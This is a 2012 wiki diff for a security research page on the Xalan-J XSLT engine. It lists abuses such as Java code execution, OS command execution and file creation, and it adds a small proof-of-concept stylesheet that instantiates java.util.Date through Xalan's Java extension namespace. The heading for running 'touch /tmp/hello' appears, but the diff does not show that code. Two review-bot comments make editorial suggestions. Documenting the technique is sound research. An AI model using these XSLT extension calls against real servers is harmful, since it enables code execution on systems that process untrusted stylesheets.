Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version 40.1
edited by Nicolas Gregoire
on 2012/01/11 23:29
Change comment: There is no comment for this version
To version 45.1
edited by Nicolas Gregoire
on 2012/01/11 23:38
Change comment: Upload new attachment xalanj-java-date.xsl

Details

Page properties
Content
... ... @@ -22,7 +22,7 @@
22 22  * Java properties disclosure
23 23  * Java environment disclosure
24 24  * Java code execution
25 -* Arbitrary command execution
25 +* OS command execution
26 26  * File creation
27 27  * JDBC connectivity
28 28  
... ... @@ -44,12 +44,11 @@
44 44  
45 45  The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
46 46  
47 -
48 48  |=Namespace|=Extension function|=PoC|=Sample output
49 49  |http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date:
50 50  Wed Jan 11 22:45:07 CET 2012
51 51  
52 -== Execution of external commands ==
51 +== OS command execution ==
53 53  
54 54  The following code will execute the command "touch /tmp/hello" :
55 55  
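Review bot: the heading rename at new line 51 ("== OS command execution ==") may break links elsewhere in the wiki that target the old heading title "Execution of external commands", so those should be checked and updated in the same edit. In the table row above it, the Sample output cell carries one fixed timestamp (Wed Jan 11 22:45:07 CET 2012); labelling it as an example value would make clear that the output differs on every run.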
xalanj-java-date.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +409 bytes
Content
... ... @@ -1,0 +1,11 @@
1 +<xsl:stylesheet version="1.0"
2 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
3 + xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
4 + exclude-result-prefixes="date">
5 + <xsl:output method="text"/>
6 + <xsl:template match="/">
7 + <xsl:variable name="dateObject" select="date:new()"/>
8 + <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/>
9 + </xsl:template>
10 +</xsl:stylesheet>
11 +
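Review bot: missing documentation: the stylesheet carries no comment saying what it demonstrates or what output to expect, so a reader who downloads the attachment on its own has to infer that date:new() instantiates java.util.Date through the namespace bound on line 3. Suggest an XML comment just inside the xsl:stylesheet element naming the extension namespace and the expected "Current date: ..." output. The empty line 11 at the end of the file can also be dropped.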